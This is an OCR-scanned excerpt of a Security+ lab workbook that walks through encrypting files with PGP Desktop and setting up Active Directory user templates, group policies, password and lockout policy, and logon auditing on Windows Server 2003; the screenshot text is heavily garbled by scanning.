Alowed:  [V]agEs [V]casT [V TripeDEs  [WIDEA  [V] Twafish

Ciphers

Preferred: | AES -

Hashes
Allowed:  [¥]SHA-2-256 [¥]sHa-2-384 [¥]sHA-2-512

[VIRIPEMD-160 ] SHA-L
Fofred

Compression

Allowed: Ezip2 7LIE 7ip Mone

10. Click Cancel to return to the PGP Setup Assistant Name And Email Assignment
screen. Click Next.

11. Enter a passphrase (twice). The longer the passphrase, the stronger the protection, as
long as you can remember and reenter the passphrase correctly when you need to access
your protected content. You might choose a line from a favorite song or movie as your
passphrase.

PGP Setup Assistant

Create Passphrase

P& P Desktop

Wour private key will be protected by a passphrase. Itis important ko keep your
passphrase secret and do not write it down,

Enable User~/

Licensing ~"

New 7

Key Generation ~ !
In i

‘our passphrase should be at least 8 characters long and should contain
non-alphabetic characters.
Enter Passphrase: Show Keystrokes [~

Re-enter Passphrase:

Passphrase Quality: | 0%

< Back ][ MNext = ][ Cancel ][ Help
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Notice the quality rating of your new passphrase as you type it in. You increase the
strength of the passphrase by adding characters (making the passphrase longer), by
mixing upper- and lowercase alpha characters, and by adding numbers and symbols to
the passphrase. You don’t get extra points for repeating characters.

Select the Show Keystrokes check box to display your passphrase, but be aware of who
else might be able to “shoulder-surf” and see your new passphrase. You may have just
given up all of your newfound security!

After you have successfully entered your passphrase twice, click Next.

ITE passphrase after implementing PGP encryption, you may not ever be able

%’ You must remember your passphrase exactly. If you cannot reenter the
to access your protected data.

)/ You should never write down your passphrase and never share it with
AéTE anyone else. If someone else has your passphrase, they can assume
your identity within the IT/PGP system and can decrypt all of your PGP-
protected confidential information.

12. Your new asymmetric key pair is generated. The private key of this key pair can only
be accessed by successfully entering your passphrase. Click Next.

PGP Setup Assistant

Key Generation Progress

P& P Desktop

Some of the Following steps may require several minutes to complete.

Enable User~/

; Key generation steps:
Licensing ~

W Generating Key
w Generating Subkey(s)

G
Mess.
Additional Fe. 25 Congratulations

‘You have successfully generated a PP keypair which will sllow you ta recsive secure
messages and sign documents,

Click Mext to add your new keypair to your keyring and continue.

< Back [ Mext = ][ Cancel ] I Help ]

13. Since this new installation of Windows 7 does not have any email or AOL IM accounts
configured, clear both check boxes on this screen and click Next.
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PGP Setup Assistant

PGP Messaging: Introduction

PGP Desktop integrates seamlessly into your messaging, PGP automatically detects
2 and configures itself to secure the vast majority of email accounts and servers,
Enable User ~ SMTP, POP, IMAP, Exrhange Server, and Lotus Motes arcess are proxied by PGP,

Licensing ~
4 4 PGP also encrypts AOLE Instant Messenger™ instant messages between vou and
New L
. other PGP users,
Key Generatior
Global Directory
Messaging ~

[ Automatically detect my email accounts

D Automatically encrypt AQLE Instant Messenget™ communications

< Back Mext = ][ Cancel l l Help

14. Click Finish.

Creating a PGP-Protected Collection of Files

1. Create three test files on the desktop by right-clicking the desktop and selecting New >
Text Document. Name the documents Test1, Test2, and Test3. Add the following text
into each file and save the text files:

This is the secret content in these text files.

n
i)
C
Recycle Bin

b

- View 3
PGP Shredd
recder Sort by \
Refresh
B Paste
Paste shortcut

Testl Mew » Falder

[ £

Shartcut
BE  Screen resolution

PGP Zip
Rich Text Document

R W Gadgets &E| Bitmap image
| H Persanalize Contact
£ Journal Document
Test2 o)

| Text Document
1, Compressed (zipped) Falder

Briefcase

Speakers: 100%
= [0 w5 &S0 E ) o

ol e
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Launch the PGP Desktop application. You can do so by clicking Start » PGP Desktop,
or by clicking on the PGP icon in the system tray in the lower-right corner.

"
i)
——

h-a‘ Matepad

p—
Jl Getting Started

! Cannect ta a Projectar
2
&b‘ Remate Desktap Cannection

Sticky Mates

% Snipping Toal

= Caleulatar

/) paint

‘4 HPS Viewer

7

S,;‘ Windows Faxand Scan

ﬂ PGP Desktop

»  AllPrograms

Bull H
Documents.

Pictures.

Music

Computer

Control Panel

Devices and Printers

Default Programs

Help and Support

)

@ = o9

b0 Ll O [ e )

In the left-hand pane, click PGP Zip » New PGP Zip.

5:09 PM
1/20/2011

File  Edit

View Tools

Zip

-
ﬂ PGP Desktop - Verification History

Help

o Verification History

Signer

Key ID Verified

“ 1
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Enable the Shred Originals check box. This option overwrites the unencrypted original
files so they cannot be recovered and exposed using recovery tools. The following

graphic shows Test1 and Test2, but drag all three files, Test1, Test2, and Test3, into the
PGP Zip utility. Click Next.

PGP Zip Assistant
PGP DC’Sk’fD,D aay, New PGP Zip
This assistant will help you secure Files and Folders For storage or bransfer, Drag and drop your
files into the box, or use the butkons below to browse For your selection.
MName Size Type

| TestLtt 0 bytes  Text Document
] Test2t Obytes Text Document

G| |2 L 3 Shred otiginals

= Back Mext » ] [ Cancel ] l Help ]

Review the choices and descriptions of how to encrypt or sign the PGP Zip file. You

want to encrypt these files for your own use, and you do not intend to share them with
others. Choose the Recipient Keys radio button.

Notice that two of these options allow you to secure the PGP Zip file with a new passphrase
so you can share the protected files with others. If you use the passphrase options, you
would 7ot want to use the passphrase you use to protect your own PGP keys, because you
must share the new passphrase with each intended recipient of this PGP Zip file.

Click Next.

PGP Zip Assistant

PGP DC’S)’(’IO,D Encrypt

Choose how you wank ko encrypt to your recipients, IF you are unsure of a particular option
click it to see an explanation below,

@) Recipient keys
1 hawe keys For all recipients {most secure)
() Passphrase
1 don't have keys for all recipients, but they all use PGP Deskkop

() PGP Self-Decrypting Archive
Recipients do nok use PGP Desktop

(") Sign Only
Create a PGP Signature file (no encryption)

Use this option if you have keys for all recipients {on vour PGP Desktop keyring, 3
keyserver, ar the PGP Global Directary). It offers the highest security, IF the encrypted
file is For you, you must have a keypair created using PGP Deskbop. IF you do not, click
Cancel ko skap this PGP Zip Assiskant, then choose File- =New PGP Key.

[ <Back |[ mext= | [ Concel | [ Heb
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6. In this case, you are encrypting the files for your own use. By default, you are
automatically on the list of recipients for this content.

PGP Zip Assistant

PGP DC’Sk’po Add User Keys

Enter User Keys for recipients you want to encrypt to.

Enter the username ar email address of a key

[=rrm

i Bull T@hotmail.com> o Remove
[ < Back H Mext » ][ Cancel ] l Help

7. The signing option provides strong authenticity of the source of the content, proving
that you created this file. It also provides a strong integrity validation check at the time
of use (decryption). You would sign the file to prove to the other recipients (if there
were any) that it was really you who provided this content. Choose your signing key
from the drop-down list.

Verify the output file save location is your desktop, and rename the file to TestDocs. pgp.
Click Next.

PGP Zip Assistant

PGP DC’S)’(’ID,D Sign and Save

Signing your PGP Zip allows yaour recipients ko verify its authenticity, Confirm waur signing key
and the save location below,

Signing Key

[Bull <o~+= @hotmal.com:» -

The passphrase of the currently selected key has been cached.

Save Location

Ci\Users\BulliDesktopiTestDocs. pap

Save Detached Signature(s)

[ <Back |[ mext> | [ cancel | [ Hep
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8. Since you earlier chose to shred the unencrypted originals (delete the files, then
overwrite the space on the hard drive where the originals were stored), you must now
confirm that you want to make these original files unrecoverable. If you click Yes,
the only accessible copy will be encrypted. The only way to recover this content to
a readable state is to successfully enter your passphrase when you need to access the
content again. Click Yes to complete the encryption and shredding processes.

PGP Warning

1Y

undone,

Are yau sure you want ta shred the original files?

This operation will permanently delete the original files and can not be

9. Review the details of the actions taken by PGP Zip. Click Finish to close the PGP Zip

wizard.

PGP Zip Assistant

P& P Desktop

Finished

Your PGP Zip is secured
= @ 7ip -
Creating PGP Zip TestDacs.pgp
£ 83 User Keys
Tl Bull <l @hotmail.com>
= # Signing
L Signing with key Bull dihatmail.cam >

m

= . Files & Folders
| Testlidt
| Testlut
L Testitd
=] Shredding
Shredding Test3.bt
Shradding Tect) tut

< Back Cancel Help

10. Notice that the three original, unencrypted files are gone from the desktop, and
the new PGP Zip file, TestDocs. pgp, has been placed on the desktop. The file
extension may not be shown, depending on the file system settings on the Windows 7

installation.

11. Close the PGP Desktop utility by clicking on the red X in the upper-right corner.
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Accessing the PGP-Protected Collection of Files

1. Double-click the TestDocs icon on your desktop. Doing so launches the PGP Desktop
utility and opens the PGP Zip function. Notice the three Test files you encrypted
previously. Right-click on Testl.txt and select Extract.

.
([3) PGP Desktop - TestDocs ==

File Edit View Tools Zip Help
M E TestDocs

File Name TestDocs.pgp
Location C:\Users\Bull\Desktop
Size 3.12KB

Status Decrypted and Verified

Bull <i.. -~ Y@hotmail.com>, IxE 1783279, Implicit

@ Verification History

L

= B Text Document
Extract... Text Document
Add Files... Text Document

Mew Falder

Paste Ctrl+V

Delete Del

Select All Ctrl+A

2. In the Browse For Folder dialog box, click Desktop, and then click OK. The Test1
file appears, unencrypted, on the Desktop. Open the file and verify the contents are
readable.

Notice that you were not prompted for your passphrase. To simplify your login session,
once you have entered your PGP passphrase, PGP will cache the passphrase for that
Windows login session. At this time, your passphrase is cached, and you do not need to
enter it to access the protected content.

Close the Testl. txt file. Close PGP Desktop.

3. Next you will clear the PGP passphrase from the cache, and then access the PGP-
protected content. Restart the Windows 7 computer. This clears the PGP passphrase
cache.

4. Login as the local Administrator, the same account you used in the previous part of
this exercise.

5. Double-click the TestDocs icon on your desktop. Doing so launches the PGP Desktop
utility and opens the PGP Zip function. It will also open the Passphrase dialog,
prompting you for your passphrase. Enter your passphrase and click OK.
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=
;".'J Eﬁ;ﬂ PGP Desktop - TestDocs =& 2

Recycle Bin Testl] BT

View Tools Zip Help

. E TestDocs

File Name TestDocs.pgp

PGP Shredder

Location C:AUsers\Bull\Desktop

e s e

This object was encrypted to the Following public key(s):
Bull <. @hotmail.com> (R5A/2048)

@

@ Verification History

[

L Show Keystrokes [

Enter passphrase for your private key :

o < o [P )

6:07 PM
vmu|

6. Now you will be able to access your PGP keys and extract the test files from the PGP-
encrypted TestDocs file. Your PGP passphrase will be cached for this login session.

Criteria for Completion

You have completed this task when you have encrypted content and then recovered content
using PGP Desktop. First you downloaded, installed, and configured PGP Desktop with
your passphrase-protected key pair. Then you used PGP Zip to encrypt several files. Finally
you recovered (decrypted) the PGP-protected content.
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Accounts




The weakest link in the security of an enterprise is its
users. Your job as a security administrator is to implement
the strongest security possible. Through user-account
management, you can introduce security controls that will help strengthen the security
of your information systems.

The user-account controls take the form of creating user accounts with a standardized
account template to establish the baseline permissions, implementing a strong password
policy, auditing failed logons to detect password-cracking attacks, securing default
accounts, and implementing Deny groups on sensitive content.

The tasks in this phase map to Domains 1, 3, and 4 objectives in the
TE CompTIA Security+ exam (www.comptia.org/certifications/listed/

security.aspx).

Task 5.1: Creating User Accounts

To provide as much security as possible while creating user accounts, administrators
take advantage of user account templates to establish a minimum baseline of permission
required for each role in the enterprise. Only after this baseline is found to lack sufficient
privilege will an administrator increase the level of privilege by granting only the additional
permissions necessary for the worker to perform the tasks required of their role.

Further, the placement of the user account in the proper organizational unit (OU) within
Active Directory (AD) implements user-based security controls by Group Policy Object
(GPO). GPOs can be applied at the AD site, domain, or OU level.

Scenario

You are an administrator in an AD environment. One of your responsibilities is to create
all user accounts for the domain. You must perform this task while implementing the
utmost security for the environment.
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Scope of Task

Duration
This task should take 30 minutes.

Setup

You have just been informed of the need to create five user accounts for a new role today,
with another 100 users expected to be added over the next three months. These first five
users will begin working next week.

To provide user access following the principle of least privilege, these roles require
special desktop controls to be implemented on their desktops.

Caveat

As users are created, unless proper security is implemented, attackers can compromise
these accounts and gain unauthorized access to many resources.

Also, the implementation of GPOs can adversely affect the operations and security of
your information systems. If the implementation is too lax, users gain too much access.
If it’s too tight, required resources may be unavailable to users.

Procedure

For this task, you will configure a new user template account and secure this template.
Then you will create the five users based on this template, secure them properly, and place
them into the proper OU. Next you will write the desktop GPO required for these users
and link it to the proper OU.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

s Domain Administrator access

Details
Building a User Account Template

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

Expand the domain. Click on the domain name.

In the right pane, right-click and select New » Organizational Unit.
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5. Name the new OU Widget Production. It should become the selected item in the
left pane.

6. In the right pane, right-click and select New » User.

Assign the new user the name _WProd_Template and set the user logon name to
WProd. Click Next.

New Object - User 3 x|

g Create in:  mobeer.com/Widget Production

First name: I_WF‘rnd_T emplate Imitials:

Last narne: I

Full name: I,WPdefT emplate

User logon name:

IWProd I@meEEI.CUm d

User logon name [pre-windows 2000
[MoBEERY [oProd

< Back I Next > I Cancel

Create the template account with the underscore (_) as the first character
TE so it will come first alphabetically and will be easy to locate as the OU

becomes populated with potentially hundreds of user accounts.

8. Enter a strong password for the template account and enable the User Must Change
Password At Next Logon (enabled by default) and Account Is Disabled settings. Click
Next, and then click Finish to create the account.

A password is typically considered average strength when it contains 8

TE characters; 14 characters or longer is considered strong. Strong passwords
should include at least one uppercase alpha, at least one lowercase alpha,
and at least one numeric or symbol character.You will not need to remember

the password for this template account. No one should ever log onto this
template account.

@:" It is important to ensure that this template account is disabled!
ING



12.
13.
14.
15.
16.
17.

Task 5.1: Creating User Accounts 255

New Object - User =l

g Create in:  mobeer. com/AWidget Production

Password: qunnnn

Confirm password I--“""""

¥ User must change password at next logan
[~ User cannaot change password
[~ Password never expires

F7 fccount is disabledt

< Back I Mext > I Cancel |

Notice the account has a red dot with a white X on it, indicating that it is disabled.

. In the white space below _WProd_Template, right-click and select New » Group, and

create a new Global Security Group named Widget Production GG.

In the white space below _WProd_Template, right-click and select New » Group, and
create a new Domain Local Security Group named Widget Production DLG.

£ Active Directory Users and Computers =101 x|
@ File Action Wiew ‘Window Help | =] s |
e | BE B EFNR R [elEa TS
@ Active Direckory Users and Computers | Widget Production 3 objects
[0 saved Queries Hame # [ Tvpe [ Description |
E‘“ Eb:EL'wm ﬁprrudjsmp\ate User

M-

@ Cl:IIEETS ﬁiwidget Production DL Security Group - Domain Local

E-( Computers @Wldget Production G& Security Group - Global

&) Domain Controllers

D ForeignSecurityPrincipals

{23 Hardened Servers

[E3 users

--{3] Widget Production
| e —— Bl

Double-click on Widget Production GG and select the Members tab. Click Add.
Click Advanced.

Click Find Now to display all users and groups in the domain.

Click the user account _WProd_Template. Then click OK.

Click OK again to add this user into the Widget Production GG.

Click OK to close the Widget Production GG Properties dialog box.



256 Phase 5 = Managing User Accounts

Adding a Global Security Group to a Domain Local Group
Now you will add the Widget Production GG into the Domain Local Group called Widget
Production DLG.

1.  Double-click on the Domain Local Group named Widget Production DLG. On the
Members tab, click Add.

Click Advanced.

Click Find Now to display all users and groups in the domain.

Click the Widget Production GG. Then click OK.

Click OK again to add the Widget Production GG into the Widget Production DLG.
Click OK to close the Clients DLG Properties dialog box.

Remember the AGDLP chain (User Accounts get added to Global Groups; Global Groups
get added to Domain Local Groups; Local Groups get granted Permissions). You have just
assembled AGDL of the AGDLP chain for granting permissions. That is, you placed Users
(accounts) into Widget Production GG (global groups), and Widget Production GG into
Widget Production DLG (domain local group). Next you will grant the Widget Production
DLG permissions, both NTFS and share-point permissions, as desired. Any user account
created from this template will already be a member of this chain of permissions.

% The process of building AGDLP is detailed in Phase 4, Task 4.8.
TE

You have created a template account in the proper OU to base all Widget Production
users on. This account has a strong password, is disabled, will require users based on this
template to change their password at first logon, and has been granted membership to the
Widget Production GG and the resulting resource accesses.

© g M WD

Creating Users Based on the New User Account Template

1. In ADUC, in the Widget Production OU, right-click on the _WProd_Template user
object and select Copy.

Type Prod1 in the First Name field and the User Logon Name field. Click Next.
Type in a strong password twice. Notice the two settings that are enabled:

s User Must Change Password At First Logon

= Account Is Disabled

Retain these settings and click Next.

You will need to record this username and password and provide it to the
TE worker, Prod1, for their first logon. The new user will be forced to change

this password as they log on for the first time.
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Click Finish to create the new user Prod1, based on the user template _WProd_Template.
Repeat steps 1 through 4 and create users Prod2, Prod3, Prod4, and Prod$5 similarly.

=1olx
[ISEE]

‘fJ Active Directory Users and Computers

@ Fle Action Wiew window Help
coBmii e XFIRIRIBRETEE

@ Active Directory Users and Computer: | Widget Production 8 objects
-] Saved Queries Name / [ Type [ Descriptian |
= @ Ebge_r'_wm %_WProd_Temp\ata User

uiin %Pmdl User

{&8] CLIENTS
(22 Computers %Pmdz User

{&] Domain Contrallers CErrads User
D ForeignSecurityPrincipals PrucH User
X orods

(&8 Hardened Servers
(23 users €52 widget Production DLG Secutity Group - Domain Local

L..{&3] Wiidget Production ﬁEW\dget Production GG Security Group - Global

)’ As the new workers show up for work, you would enable the appropriate
A&TE account and provide each worker with their new username and password.
You should advise the worker that they will be forced to change their

password at first logon.

6. Double-click on the group Widget Production GG and select Members. Confirm that
your five new users are members of this global group.

Widget Production GG Properties 2ixl

General  Members I Member Df| Managed B}l'

Members:

Mame | Aclive Directory Folder

%_\N"F‘rnd_Tem mabeer. comSwidget Praduction
% Prad1 mobeer. comwidget Production
% Prad2 mobeer. comwidget Production
% Prod3 mobeer comAidget Production
% Prodd mobeer comAidget Production
% Prods mobeer comAidget Production

Add... Remove |

0K | Cancel Apply

7. Close the Widget Production GG.
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Securing the Widget Production Users with a GPO

1. In the left pane of ADUC, right-click on the Widget Production OU and select
Properties. Select the Group Policy tab.

2. Select New and name the new GPO WProd Desktops.

Genelal' Managed By' Dbiect' Security' COM+  Group Policy |

Taimprove Group Policy management. uparade to the Group Policy
Management Consale [GPMC).

&4
Current Group Policy Object Links for Widget Production
—

Group Policy Object Links Mo Overide | Disabled

Group Policy Objects higher in the list have the highest priarity.
This list obtained from: no.mobesr. com

Mew | g | Edt | |

Options. .. | Delete... | Properties | Do |

™ Block Policy inheritance

Cloge I Cance| | Lippli |

3. Click Edit. Expand the GPO to view User Configuration » Administrative
Templates » Desktop.

4. Double-click on Remove My Computer Icon On The Desktop. In the resulting dialog
box, select the Enabled radio button, and then click OK.

Remove My Computer icon on the desktop Properties 2l

Setting | Explain |

}’i Remove My Computer icon on the desklop

" Mot Configuied
 Enabled
" Disabled

Supported an: At least Microsoft Windows <P Professional or windo...
Previous Setting | Next Setting |

(u] I Cancel | Apply |

5. Double-click on Prohibit User From Changing My Documents Path. In the resulting
dialog box, select the Enabled radio button, and then click OK.
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6. Double-click on Prohibit Adjusting Desktop Toolbars. In the resulting dialog box,
select the Enabled radio button, and then click OK.

The Desktop settings selected are simple, representative controls that
TE could be enabled. Any GPO settings in the User Configuration region of

this GPO will apply to all users in the Widget Production OU.

7. Close the GPO by clicking the X in the upper-right corner.

Criteria for Completion

You have completed this task when you have built the template account with the proper
security controls in place, created several users based on that secure template, and configured
a GPO and linked to the OU containing the new user accounts to further secure those users.

Task 5.2: Implementing
the Password Policy

One of the most important components of securing your information systems is implementing
a strong password policy. This is accomplished by editing the Default Domain GPO in the
Windows Server 2003 Active Directory Users and Computers management console. Setting
the password policy at any other location in the Windows Server 2003 Active Directory or

on the local computer affects the local users’ password requirements, not the requirements
for their domain user passwords.

In Windows Server 2000 and 2003 Active Directory, each domain may have
TE only one effective password policy. It must be set in a GPO linked to the
domain in the AD hierarchy. Windows Server 2008 and Windows Server

2008 R2 Active Directory allow for Fine Grained Password Policies. This is
a password policy that may be different at each OU within a domain.

Scenario

You are an administrator in a Windows Server 2003 AD environment. You are responsible
for the security of all user accounts. You must implement account policies in your domain
to enforce the company standard for these password settings.
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Scope of Task

Duration
This task should take 15 minutes.

Setup

You need to strengthen the security of the environment, and a strong password policy is
your next step in accomplishing this.

Caveat

It is well recognized that a strong password policy is an essential element of strong security
in an environment. However, if the policy is set too rigidly, users struggle to remember
their passwords and continuously lock their accounts by entering incorrect passwords,
resulting in increased administrative overhead to unlock them, and/or they write down
their difficult passwords and store them in a handy location. Unfortunately, this “handy”
logon information is also handy for the attacker. By strengthening the password policy too
much, you effectively weaken the overall security of the environment.

Modifying any GPO, especially the default domain policy, is a dangerous thing to do.
This specific policy affects every computer and every user in the domain. Inappropriate
changes to this policy could severely cripple access to your information systems.

Always use caution when modifying any GPO, be sure you understand the ramifications
of your configuration, and carefully consider where you have the GPO linked.

Procedure

For this task, you will configure the password policy in the Default Domain GPO with the
following password policy settings:

s The password must consist of at least eight characters.

= A password must contain at least one uppercase alpha character, at least one lowercase
alpha character, and at least one number or symbol character in the password
(password complexity).

s Users must change their passwords every 45 days, and cannot change them again for
35 days once set.

s Users cannot reuse a password for the next 24 new passwords.

» If a user types the wrong password three times in a 30-minute period, the user account
gets locked and an administrator must unlock the account before the user can log on.

Equipment Used

For this task, you must have:
= Windows Server 2003 domain controller system

s Domain Administrator access
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Details
Setting the Password Policy in the Default Domain Policy

1.

Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

Select Start » Programs » Administration Tools » Active Directory Users And
Computers.

Expand the domain. Right-click on the domain name and select Properties.

Select the Group Policy tab. Select the Default Domain Policy.

mobeer.com Properties . 2l
Eenelal' Managed Ey' Elb|ect| Security  Group Policy I

Taimprove Group Policy management, upgrade to the Group Policy
Management Conzale [GPMC).

O
Curent Group Policy Object Links for mobeer
—

Group Policy Object Links Mo Override | Disabled

£ 0 efault Domain Policy

Group Policy Objects higher in the list have the highest priority.
This list obtained from: rio.mobeer. com

New | agd. | Edi | s |
DOptione... | Delete... I Properties | ey |

[~ Block Policy inheritance

Cloze | Cance| | Zpply |

Click Edit. Expand the GPO to view Computer Configuration » Windows Settings »
Security Settings » Account Policies » Password Policy.

Notice that the Enforce Password History setting is by default set to where you need it:
at 24 Passwords Remembered. The range is from 1 to 24 passwords remembered.
A setting of 0 means users can reuse the same password.

Double-click on Maximum Password Age. Set the Password Will Expire In field to
45 days, and then click OK. The range is from 1 to 999 days. A setting of 0 means
passwords never expire.

Double-click on Minimum Password Age. Set the Password Can Be Changed After
setting to 35 days, and then click OK. The range is from 1 to 998. A setting of 0 means
passwords can be changed immediately.

Double-click on Minimum Password Length. Set the Password Must Be At Least field
to 8 characters, and then click OK. The range is from 1 to 24. A setting of 0 means
blank passwords are accepted.
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10. Notice that Password Must Meet Complexity Requirements is by default set to
Enabled.

=0l x|

File Action Yiew Help
& = | &2
Default Domain Policy [rio.mobeer.com] Policy Policy  # |Pu\ic Setting
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(1 Software Settings [R#]Maximum password age 45 days

(12 windows Settings o password age 35 days
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{22 Public Key Policies
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g 1P Security Policies on Active Direc
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(23 windows Sattings

[£3 Administrative Templates

Setting the Account Lockout Policy in the Default Domain Policy
1. In the left pane, select Account Lockout Policy. Notice the default settings.
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Kerberos Policy
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Event Log
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= gﬁ User Configuration
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Double-click on Account Lockout Duration. Set this to Account Is Locked Out For:

0 Minutes. As you select 0 for the number of minutes, the dialog box changes to read
Account Is Locked Out Until Administrator Unlocks It. Click OK. The range is from 1
to 99,999 attempts.

Double-click on Account Lockout Thresholds, set Account Will Lock Out After to

3 Invalid Logon Attempts, and then click OK. The range is from 1 to 999 attempts.
A 0 setting means the account is never locked out by the Account Lockout Policy.

Double-click on Reset Account Lockout Counter After and set Reset Account Lockout

Counter After to 30 Minutes; then click OK. The range is from 1 to 99,999 minutes.

‘:ﬁ Group Policy Object Editor i

File  Action VWiew Help
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=§ Default Domain Policy [tio. mobeer .com] Policy
- Computer Configuration
(23 Software Settings
Windows Settings
Scripts {Startup/Shutdown)
Security Settings
EI"@ Account Palicies

Password Palicy
-- Account Lackout Palicy
- Kerberos Palicy
- =g) Local Policies
[ Event Log
-8 Restricted Groups
B8 System Services
B8 Registry
&
B
B
B

178 File System

]“I" ‘Wireless Network (IEEE S02,11% Pe
+1-[22] Public Key Policies

(1 Software Restriction Policies

[ .g IP Security Policies on Active Direc
-3 Administrative Templates

EI& User Configuration

-2 SoFtware Settings

123 windows Settings

-3 Administrative Templates

| | ]

Policy  #

| Palicy Setting

Account lockout duration

1)

Account lockout threshold
Resat account lockout counter after

3invalid logon attempts
30 minutes

5. Close the GPO by clicking the X in the upper-right corner. Click OK in the DomainName
.com Properties dialog box, where DomainName.com is the name of your domain.

2

password change.

Criteria for Completion

This policy should be effective within a few minutes of closing the property
pages for the domain. Users will experience these settings with their next

You have completed this task when you have modified the Default Domain GPO to match
the specified Password Policy settings and the Account Lockout Policy settings.
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Task 5.3: Auditing Logons

It is important to know when users are authenticating on your network. This could reveal
such events as a user authenticating at unexpected times of the day or week, or users failing
to correctly authenticate. The latter indicates a possibility that a user account is being

used in a brute-force logon attack (when an attacker is trying to guess a user’s password

by attempting multiple logons so that the attacker can gain unauthorized access to system
resources).

Two settings are related to the auditing of logons. The first, Audit Account Logon
Events, identifies when a user attempts to authenticate against a domain controller. In other
words, a user is attempting to log on as a domain user. This event gets recorded in the
authenticating domain controller’s security event log.

The second, Audit Logon Events, identifies when a user attempts to authenticate against
the local account database. In other words, a user is attempting to log on locally, as a local
user. This event gets recorded in the local system’s security event log.

Scenario

You are an administrator in an AD environment. You are responsible for the maintenance
of security for all domain user accounts. You must be able to track who logs on or attempts
to log on, from which system, and at what time and day. An appropriately configured audit
policy is the proper tool to implement this capability.

Scope of Task

Duration
This task should take 15 minutes.

Setup

You need to generate an audit trail of all domain user logons. You will implement an audit
policy for account logons in the Default Domain Policy GPO.

Caveat

Implementing an audit policy is a common approach to monitoring and recording events
on your information systems. An administrator should be aware of several aspects of
auditing:
= Review the log files, manually or with an automated tool. Monitoring the audit logs
of many domain controllers and servers can be an overwhelming task. Third-party
applications are often used to collect and filter the logs from numerous servers to make
them intelligible to the administrative staff.
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= Secure the log files to prevent scrubbing of the logs. An attacker will erase his tracks in
the log files if you do not implement proper security on the log files.

s Know when a real problem exists versus when there is just “noise.” In this case, from
time to time users will be working late or may forget their passwords. This is routine
noise. It should be recognized as such and not be confused with fraudulent activities or
brute-force password-cracking attacks.

= Know how to react when you do detect a real problem. You should have an incident-
response team and plan in place for the occasions when a real threat is perceived.

s Turn the log files and be aware of the log file size so you don’t fill a drive and crash a
system. To turn the log files, save the log as a file to the hard drive, and then clear all
events on the log.

Once again, modifying any GPO, especially the Default Domain Policy GPO, is a
dangerous thing to do. This specific policy affects every computer and every user in
the domain. Inappropriate changes to this policy could severely cripple access to your
information systems.

Always use caution when modifying any GPO, and be sure you understand the
ramifications of your configuration, as well as where you have the GPO linked.

Procedure

For this task, you will configure the audit policy in the Default Domain GPO to detect all
domain account logons and failed domain logon attempts.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

s Domain Administrator access

Details
Setting the Audit Policy in the Default Domain Controllers Policy

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

Expand the domain. Right-click on the Domain Controllers OU and select Properties.
Select the Group Policy tab.

Create a new GPO by clicking the New button and typing the name Audit Account
Logon Policy. Click Edit.
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Domai trollers Properties 2lx|

Gienersl | Mansged By | Object | Secuity| COM+ Group Policy |

To improwe Group Palicy management, uparade to the Group Policy
Management Console [GPMC]

o
Current Group Palicy Object Links for Domain Controllers
—

Giroup Policy Object Links |_No Ovenide |_Disabled |
15 Default Domain Controllers Policy
Effaudit Aecount Logon Policy

Group Palicy Objects higher in the list have the highest priority.
This list obtained from: rio.mobeer. com

New Add... Edft Up

Optiors. Delete Eroperties Down

™ Black Policy inheritance

EEo I

6. Expand the GPO to view Computer Configuration » Windows Settings » Security
Settings » Local Policies » Audit Policy.

=
File  Action Wew Help
e+ |EE] X B
Audit Account Logon Policy [rio.mobeer.com] < | | Palicy | Policy Setting
Computer Configuration Aud\t account logan events Mot Defined
{13 Software Settings Audit account management Nat: Defined
(1 Windows Settings audit directory service access Mot Defined
] seripts (startupjshutdown) udit logon events Mot Defined
B1-[58 Security Settings Audic object access Mot Defined
g Account Policies udit policy change Mot Defined
=) Local Policies " .

B " Audit privilege use Mot Defined
wdit process tracking Mot Defined
Audit system events ot Defined

User Rights Assignment
Security Options

ﬁ Event Log

(28 Restricted Groups

(C8 System Services

{8 Registry B
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7. In the right pane, double-click on Audit Account Logon Events.
8. Set Define These Policy Settings to Success and Failure. Click OK.

Audit account logon events Properties 21|

Secuily Policy Setting |

Audit account logon events

¥ Define these policy seftings

Audit these attempts:

¥ Success

oK I Cancel Apply
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Configuring the Security Event Log in the Default
Domain Controllers Policy

1. In the Audit Account Logon Policy, expand the GPO to view Computer Configuration »
Windows Settings » Security Settings » Event Log.

i Group Policy Object Editor =18lx|

File  Action Yiew Help

e o |EmE| @

_E?j’ Audit Account Logon Policy [rio.mobeer,com] = | | Palicy  # | Palicy Setting
B Computer Configuration [B¥]Maximum apnlication lag size Mok Defined
(2 Software Settings Maxlmum security log size Mok Defined
= D W'”dm"_’s Settings Maxlmum system log size Mok Defined
] SCFIDt.S (Start.up)’shutdown) Frevent local guests group from accessing application log Mot Defined
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' Lccn‘u: | olicies Prevent local guests group from accessing system log Mot Defined
B
E:f:nt Loolses Retaln application lag Mot Defined
{8 Restricted Groups Retaln security log Mot Defined
: . Retaln system log Mot Defined
@ System Services
8 regstry Retent\on method for application log Mot Defined
-8 File System Retent\on method for security log Mot Defined
Wireless Metwork (IEEE 802.1 Retent\on method for system log Mok Defined
(2 Public key Policies -
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2. Double-click on Maximum Security Log Size.

)’ Audit events get written to the security log, and are viewed and managed
@TE in Event Viewer.

3. Define the policy setting and configure the size to 100,000 kilobytes (100 MB).
The range is from 64 KB to 4 GB and must be in increments of 64 KB. This size
will be automatically adjusted as you configure the settings. Each event consumes
approximately 500 bytes; 100 MB allows for approximately 200,000 events written
to this security log.

Maximum security log size Properties 4 ed |

Secuiity Policy Setting I

4 Maximum security log size
=5

¥ Define this policy setting

100000 _I::‘ kilobyte:s

& Muodifying this setting may affect compatibility with clients. services,
and applications.
For more information. see Maximum security log size, [(823659]

Ok I Cancel Apply
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4. Click OK.
5. Double-click on Prevent Local Guests Group From Accessing Security Log.
6. Set this policy setting to Enabled. Click OK.
7. Double-click on Retention Method For Security Log.
8. Set this policy setting to Do Not Overwrite Events (Clear Log Manually). Click OK.
e
Ele Action Wew Help
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‘2§ sudic dccount Logon Policy [vin.mobeer.com] « | | policy # [ Policy Setting
B Computer Configuration 8] Mascimum application log size Mot Defined
(22 Saftware Settings Mascirumn security log size 99968 kiabytes
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Configuring Security Options for Security Logging in the
